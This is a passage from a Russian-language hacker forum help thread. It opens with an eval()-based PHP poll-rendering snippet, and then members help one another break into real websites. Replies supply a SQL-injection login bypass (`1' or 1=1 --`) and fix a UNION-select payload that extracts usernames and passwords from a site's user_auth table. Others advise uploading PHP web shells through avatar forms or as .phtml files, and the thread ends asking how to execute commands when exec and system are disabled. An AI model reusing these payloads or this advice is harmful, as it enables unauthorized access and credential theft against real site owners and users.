
if (!isset($this->options[$poll_id])) {

$this->get_poll_data($poll_id);

}

$maxvote= ($this->options[$poll_id]['maxvote'] ==0) ?1:$this->options[$poll_id]['maxvote'];

$totalvotes= ($this->options[$poll_id]['total'] ==0) ?1:$this->options[$poll_id]['total'];

for ($i=0;$ioptions[$poll_id]['option_id']);$i++) {

$img_width= (int) ($this->options[$poll_id]['votes'][$i]*$this->pollvars['img_length']/$maxvote);

$vote_count=$this->options[$poll_id]['votes'][$i];

$vote_percent=sprintf("%.2f",($this->options[$poll_id]['votes'][$i]*100/$totalvotes));

$vote_val= ($this->pollvars['type'] =="percent") ?sprintf("%.1f",($this->options[$poll_id]['votes'][$i]*100/$totalvotes))."%":$vote_count;

$option_text=$this->options[$poll_id]['option_text'][$i];

$option_votes=$this->options[$poll_id]['votes'][$i];

$poll_color=$this->options[$poll_id]['color'][$i];

eval("\$result_html .= \"$loop_html\";");

}

$total_votes=$this->options[$poll_id]['total'];

eval("\$result_html .= \"".$this->get_poll_tpl("result_foot")."\";");

$this->poll_result_html[$poll_id][$this->template_set] =$result_html;

}

return$this->poll_result_html[$poll_id][$this->template_set];

}



Собстна, учитывая что на сервере mg=ON, и версия mysql 4, то только blind sqli. on error based не прокатит.

есть сайт ,при запросе вида ?action=doLogin&Username=1' выдаёт

Invalid query: select * from Users where Username='1'' AND Password=''

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' AND Password=''' at line 1

перепробовал кучу запросов , нехера не получается обойти авторизацию,каким запросом можно обойти авторизацию ?((

25cf%25e0%25f0%25ee%25eb%25fc%27%20or%20%28%282%29 %2b1%29%20 %201%20--%20&%c8%ec%ff что это за кодировка??? и это %c8%ec%ff'

swat_ said:
есть сайт ,при запросе вида ?action=doLogin&Username=1' выдаёт
Invalid query: select * from Users where Username='1'' AND Password=''
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' AND Password=''' at line 1
перепробовал кучу запросов , нехера не получается обойти авторизацию,каким запросом можно обойти авторизацию ?((


например,

username = admin

password = 1' or 1=1 --


25cf%25e0%25f0%25ee%25eb%25fc%27%20or%20%28%282%29 %2b1%29%20 %201%20--%20&%c8%ec%ff что это за кодировка???



urlencode

На одном сайте есть форма заливки аватара для юзеров, при заливке файла с расширением php все данные в файле заменяются на такую кашу


ЪьЪЮJFIF



ЪЧ;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90 ЪшC     ЪшC
     Ъюdd
"

Ъд







 Ъд╣

}
!1AQa"q2│▒║#B╠аRяП$3br┌ %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz┐└� ��├┤┬┴┼▓⌠■∙√≈≤≥ ╒ё╓╔╕╖╗╘╙╡Ё╢╣╤╥╦╧� ��бцдефгхийрстужвьызАБЦДЕФ ГХИЙЯРСТУЖВЬЫЗЪд










  Ъд╣

w
!1AQaq"2│B▒║╠а #3RПbrя $4А%Я&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz┌┐� �┘├┤┬┴┼▓⌠■∙√≈≤≥ ╒ё╓╔╕╖╗╘╙╡Ё╢╣╤╥╦╧� ��бцдефгхийрстужвьызБЦДЕФГ ХИЙРСТУЖВЬЫЗЪз
?Э╙╒┼(╒┼(╒┼(╒┼(╒┼(╒ ┼(╒┼(╒┼(╒┼(╒┼(╒┼(╒┼(╒� ��(╒┼(╒┼(╒┼(╒┼(╒┼(╒┼(╒� �(╒┼(╒┼(╒┼(╒┼(╒┼(╒┼(╒┼ (╒┼(╒┼(╒┼(╒┼(╒┼(╒┼(╒┼( ╒┼(╒┼(╒┼(╒┼(╒┼(╒┼(╒┼(� ��┼(╒┼(╒┼(╒┼(╒┼(╒┼(╒┼(� �┼(Ъы


урл аватара получается вида /images/avatar-13.php, то есть с таким расширением действительно загружается файл но содержимое его заменяется на дефолтную картинку что-ли. Может есть у кого идеи как обойти?

SergioBlog said:
На одном сайте есть форма заливки аватара для юзеров, при заливке файла с расширением php все данные в файле заменяются на такую кашу
урл аватара получается вида /images/avatar-13.php, то есть с таким расширением действительно загружается файл но содержимое его заменяется на дефолтную картинку что-ли. Может есть у кого идеи как обойти?


ты льешь напрямую шелл или jpg с кодом php?

Пробовал и так и так - результат один.

Хочу попробовать вот этот способ через мета данные картинки

_http://raz0r.name/articles/bezopasnost-zagruzhaemyx-izobrazhenij/

может выйдет что

Кто может разъяснить этот способ?

http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/

Может у кого есть мануал на русском или готовый вариант? Буду оч благодарен

SergioBlog said:
Хочу попробовать вот этот способ через мета данные картинки
_http://raz0r.name/articles/bezopasnost-zagruzhaemyx-izobrazhenij/
может выйдет что
Кто может разъяснить этот способ?
http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/
Может у кого есть мануал на русском или готовый вариант? Буду оч благодарен


бессмысленно, во-первых, изображения обрабатываются GD, которая уничтожит весь твой php-код.

во-вторых, ты сказал, что льешь php-шелл , а на выходе получаешь jpg-файл - такого быть не может, там что-то еще происходит.

Когда заливаю картинку - всё ок. Когда заливаю пхп скрипт то в файле с расширением .php оказывается картинка дефолтная.

Не работает MySQL??

_http://club-lexus.ru/faq/index.php?series_id=99999999


phpBB : Critical Error
Could not connect to the database

aydin-ka said:
Не работает MySQL??
_http://club-lexus.ru/faq/index.php?series_id=99999999


Could not connect to the database какбэ намекает.

http://bit.ly/sUlGX8

как залить шелл на website baker?

Залей в формате *.phtml, на демке, в офф сайте пашет

http://demo.opensourcecms.com/websitebaker/media/file.phtml

phpinfo();

я заливаю его через лоад языка, вроде все норм грузиться, но когда начинаю пользоваться шеллом то выкидывает на страницу загрузки языка((

/showpost.php?p=2888541&postcount=477

Помогите плз!

нашел в базе таблицы:

user_auth

emails

clients

при попытке вывести данные из user_auth , вылетает ошибка

www.xxx.xx/text.php?content_id=-4+union+select+UNHEX(HEX(concat_ws(char(58),user_n ame,user_password))+from+user_auth+limit+0,1--

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from user_auth limit 0,1--' at line 1

а из других таблиц все нормально выводится

в чем может быть проблема?????

Einstein said:
Помогите плз!
нашел в базе таблицы:
user_auth
emails
clients
при попытке вывести данные из user_auth , вылетает ошибка
www.xxx.xx/text.php?content_id=-4+union+select+UNHEX(HEX(concat_ws(char(58),user_n ame,user_password))+from+user_auth+limit+0,1--
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from user_auth limit 0,1--' at line 1
а из других таблиц все нормально выводится
в чем может быть проблема?????




Code:
www.xxx.xx/text.php?content_id=-4+union+select+UNHEX(HEX(concat_ws(char(58),user_n ame,user_password)))+from+user_auth+limit+0,1--+

скобку пропустил

Если отрублены функции exec,passthru,popen,proc_open,shell_exec,system,pc ntl_exec есть другие варианты?)))